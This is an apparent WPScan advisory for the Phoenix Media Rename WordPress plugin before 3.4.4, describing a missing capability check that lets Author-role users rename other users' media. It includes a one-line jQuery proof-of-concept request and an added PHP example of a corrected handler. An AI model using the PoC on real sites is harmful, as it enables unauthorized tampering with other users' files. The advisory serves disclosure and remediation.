wpvulndb | apple502j | WPVDB-ID:5F63D677-20F3-4FE0-BB90-048B6898E6CD
Oct 06, 2021 - 12:00 a.m.

Phoenix Media Rename < 3.4.4 - Author Arbitrary Media File Renaming

Source: wpscan.com
Tags: phoenix media rename, arbitrary media file renaming, capability checks, ajax action, author role, security issue, wordpress plugin

EPSS: 0.001 (percentile: 24.8%)

The plugin does not have capability checks in its phoenix_media_rename AJAX action, which could allow users with Author roles to rename any uploaded media files, including ones they do not own.

PoC

As an Author, go to the page to edit one of your own Media (i.e. /wp-admin/post.php?post=1993&action=edit, which contains the _mr_wp_nonce nonce) and run the below in the Web Developer console (564 being the ID of the media to edit, which does not belong to the Author):

jQuery.post(ajaxurl, { action: 'phoenix_media_rename', type: "", _wpnonce: jQuery('#_mr_wp_nonce').attr('value'), new_filename: "missingauthz", post_id: 564 })
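
One way to close the gap described above, shown as an added example rather than the plugin's own code or its 3.4.4 fix: an AJAX handler that checks the nonce and then a per-attachment capability before renaming. The hook suffix, handler name and nonce action are hypothetical, and the code assumes it is loaded inside WordPress.

```php
<?php
// Added example, not the plugin's code. The hook suffix, handler name and
// nonce action are hypothetical; every function called is a WordPress core API.
add_action( 'wp_ajax_example_media_rename', 'example_media_rename_ajax' );

function example_media_rename_ajax() {
    // 1. Nonce check: CSRF defence only. Any Author can read a valid nonce
    //    from their own edit screen, so it says nothing about ownership.
    check_ajax_referer( 'example_media_rename', '_wpnonce' );

    $post_id = isset( $_POST['post_id'] ) ? absint( $_POST['post_id'] ) : 0;
    if ( ! $post_id || 'attachment' !== get_post_type( $post_id ) ) {
        wp_send_json_error( 'Invalid attachment.', 400 );
    }

    // 2. Object-level capability check (the step the advisory reports missing).
    //    'edit_post' is a meta capability: for an attachment owned by someone
    //    else it maps to edit_others_posts, which the Author role lacks.
    if ( ! current_user_can( 'edit_post', $post_id ) ) {
        wp_send_json_error( 'You are not allowed to rename this file.', 403 );
    }

    // 3. Validate the requested name before touching the filesystem.
    $name = isset( $_POST['new_filename'] )
        ? sanitize_file_name( wp_unslash( $_POST['new_filename'] ) )
        : '';
    $old  = get_attached_file( $post_id );
    if ( '' === $name || ! $old || ! file_exists( $old ) ) {
        wp_send_json_error( 'Nothing to rename.', 400 );
    }

    // 4. Simplified rename: keeps the directory and extension, moves only the
    //    main file. Thumbnails and attachment metadata are not handled here.
    $new = trailingslashit( dirname( $old ) ) . $name . '.' . pathinfo( $old, PATHINFO_EXTENSION );
    if ( file_exists( $new ) || ! rename( $old, $new ) ) {
        wp_send_json_error( 'Rename failed.', 409 );
    }
    update_attached_file( $post_id, $new );
    wp_send_json_success( array( 'post_id' => $post_id, 'file' => wp_basename( $new ) ) );
}
```

With this check in place, the request from the PoC returns HTTP 403 for an Author targeting another user's attachment, while Editors and Administrators, who hold edit_others_posts, can still rename it.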
